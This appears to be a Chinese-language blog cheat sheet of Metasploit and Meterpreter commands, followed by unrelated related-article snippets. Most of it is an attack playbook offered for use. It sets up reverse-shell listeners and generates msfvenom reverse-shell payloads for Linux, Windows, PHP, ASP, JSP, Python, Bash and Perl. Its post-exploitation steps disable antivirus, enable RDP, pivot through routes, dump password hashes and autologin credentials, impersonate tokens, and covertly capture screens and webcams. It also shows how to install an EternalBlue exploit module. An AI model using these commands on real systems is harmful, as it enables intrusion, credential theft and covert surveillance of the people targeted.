msf下的命令

set session x:设置要攻击的session

#监听端口反弹PHP shell

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST

set LPORT

run

#end

#windows/shell_reverse_tcp模块可创建具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war

#使用windows/shell_reverse_tcp反弹shell

show payloads

use windows/shell_reverse_tcp

set LHOST

set LPORT

save

generate -h    #查看具体命令

generate -t asp #生成asp的shellcode

#监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST

set LPORT

run

#将shell上传后访问

#end

meterpreter下的命令

ps:获取目标机正在运行的进程

getpid:查看meterpreter shell的进程号

migrate :把meterpreter shell移动到PID为448的进程中

kill :杀掉PID为984的进程

run post/windows/manage/migrate:自动寻找合适的进程迁移

sysinfo:查看目标系统信息

run post/windows/gather/checkvm:检查目标是否运行在虚拟机上

idletime:查看目标机最近的运行时间

route:目标机完整的网络设置

getuid:查看当前用户名

background:将当前会话放到后台(适合在多个meterpreter会话的场景下使用)

run post/windows/manage/killav:关闭目标机系统杀毒软件

run post/windows/manage/enable_rdp:开启目标机3389端口

run post/windows/manage/autoroute:查看目标机的本地子网情况

background->route add xxx xxx(添加路由)->route print(查看路由)

↑[路由添加到已攻陷的主机的路由表中,就可以借助被攻陷的主机对其他网络进行攻击]

run post/windows/gather/enum_logged_on_users:列举当前有多少用户登录了目标机

run post/windows/gather/enum_applications:列举安装在目标机上的应用程序

run windows/gather/credentials/windows_autologin:抓取自动登录的用户名和密码

load espia(加载espia插件)->screengrab(抓取目标机的屏幕截图)

screengrab(也可直接使用screengrab命令抓取目标机的屏幕截图)

webcam_list:查看目标机是否有摄像头

webcam_snap:打开目标机摄像头拍一张照片

webcam_stream:抓取目标机视频

shell:进入目标机shell

exit:停止meterpreter会话

pwd/getwd:查看当前处于目标机哪个目录

getlwd:查看当前处于本地的那个目录

ls:列出当前目录的所有文件

cd:切换目录

search -f *.txt -d c:\:搜索C盘中所有txt文件(-f指定搜索文件模式,-d指定目录)

download c:\test.txt /root:下载目标机c盘的test.txt文件到本机root下

upload /root/test.txt c:\:上传本地root下test.txt文件到目标机c盘下

getsystem:提权

#假冒令牌↓

#有两种类型令牌:

#Delegation Tokens(授权令牌,支持交互式登录,例如远程桌面登录)

#Impersonation Tokens(模拟令牌,非交互式的会话)

在incognito下假冒

use incognito->list_tokens -u:列出可用的token

impersonate_token xxxx\\system:假冒xxxx用户进行攻击(要用两个\)

#end

hashdump:导出目标机的hash

run windows/gather/smart_hashdump:导出域所有用户的hash

移植并利用MS17-010(windows 2003)漏洞利用代码

#MSF中MS17-010不支持windows

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

将Eternalblue-Doublepulsar-Metasploit文件夹下的eternalblue-doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下

msfconsole->reload_all   #在MSF下重新加载全部文件

search eternalblue-doublepulsar    #现在就可以搜到该脚本了

利用msfvenom生成shell的命令

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse

_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

MSF常用命令备忘录的更多相关文章

  1. msf常用命令

    msf > search -r great -t exploits search命令查找rank为great的exploit msf > setg RHOST 192.168.1.102 ...

  2. Netstat 常用命令--备忘录

    Netstat 用于显示与IP .TCP .UDP 和ICMP 协议相关的统计数据,一般用于检验本机各端口的网络连接情况. 常用参数 -a (all)显示所有选项,默认不显示LISTEN相关-t (t ...

  3. docker 常用命令备忘录

    基础命令 docker version docker info docker --help   镜像命令 查看 docker images   其中: REPOSITORY:表示镜像的仓库源 TAG: ...

  4. 【MYSQL】常用命令备忘录

    source 不接路径时,查找文件的路径是执行mysql命令时的路径 接路径时,使用路径+filename [root@wordpressserver mysql]# vi demo.mysql [r ...

  5. 【长期更新】Ubuntu常用命令备忘录

    Error  Could not get lock /var/lib/dpkg/lock 出现这个问题可能是有另外一个程序正在运行,导致资源被锁不可用.而导致资源被锁的原因可能是上次运行安装或更新时没 ...

  6. mac 下常用命令备忘录

    1.查看端口号 lsof -i: 2.杀死进程 kill 41321 3.查看文件夹文件 ls ls -l //看到文件及文件夹更多的内容 ls -a //隐藏的文件 ls -la //上面的组合 4 ...

  7. git常用命令备忘录

    返回未修改状态 [git checkout . --没有的提交的,都返回到原来的状态  git clean -xdf 删除文件和目录] git checkout . && git cl ...

  8. linux常用命令大全(linux基础命令入门到精通+命令备忘录+面试复习+实例)

    作者:蓝藻(罗蓝国度) 创建时间:2018.7.3 编辑时间:2019.4.29 前言 本文特点 授之以渔:了解命令学习方法.用途:不再死记硬背,拒绝漫无目的: 准确无误:所有命令执行通过(环境为ce ...

  9. linux常用命令大全(linux基础命令+命令备忘录+面试复习)

    linux常用命令大全(linux基础命令+命令备忘录+面试复习)-----https://www.cnblogs.com/caozy/p/9261224.html

随机推荐

  1. P1525 关押罪犯(洛谷)

    前几天没做题,神经有点错乱,感觉一片虚无.今天开始继续写博客. 题目描述 S 城现有两座监狱,一共关押着N名罪犯,编号分别为1-N.他们之间的关系自然也极不和谐.很多罪犯之间甚至积怨已久,如果客观条件 ...

  2. 程序员肺被切掉一块还得去加班... 再谈“工作996,生病ICU”

    如题,为什么要说再谈“工作996,生病ICU”,因为996问题早已不是一个新问题,在我最近刚出版的新书<SOD框架“企业级”应用数据架构实战>写作期间,爆发了一次程序员“起义”,出现了一个 ...

  3. 深入理解JVM(一)Java内存区域

    运行时数据区 程序计数器 当前线程执行的字节码的行号指示器 每条线程都有独立的程序计数器,各线程之间计数器互不影响,独立存储. 如果执行的是java方法,计数器记录正在执行的虚拟机字节码指令的位置: ...

  4. Ubuntu Server 19.04配置静态IP

    这个/etc/netplan下默认有个文件50-cloud-init.yaml,直接修改它就行了 sudo vim /etc/netplan/50-cloud-init.yaml 网口名字enp0s3 ...

  5. python dict乱码如何解决

    定义字典并直接输出,结果输出结果中文是乱码展示 d={'name':'lily','age':18,'sex':'女','no':1121} print d 输出结果: {'age': 18, 'no ...

  6. JS闭包应用场景之函数回调(含函数的调用个人理解)

    首先我们来绑定一个函数给click事件,这个很好理解,就是创建一个匿名函数作为回调绑定给click事件,如下: 但如果我们想声明一个函数作为回调来绑定多个元素呢,例如下面(注意:绑定事件后不用加括号, ...

  7. 深入理解JVM(③)Java的锁优化

    前言 从JDK5到JDK6HotSpot虚拟机开发团队花费了大量的资源实现了各种锁优化技术,如适应性自旋(Adaptive Spinning).锁消除(Lock Elimination).锁膨胀(Lo ...

  8. Android实现QQ登录

    https://www.jianshu.com/p/e59bc198e88f

  9. JavaScript基础内容

    javascript:是个脚本语言,需要有宿主文件,他的宿主文件是html文件.用来交互的 Javascript基础  写法分类: 1.内联(行内):写在标签里面,以事件属性表现 属性名就是事件属性名 ...

  10. zookeeper 源码编译

    环境:mac 1.github上下载 源码 项目地址:https://github.com/apache/zookeeper 2.安装 ant mac:brew update ->  brew ...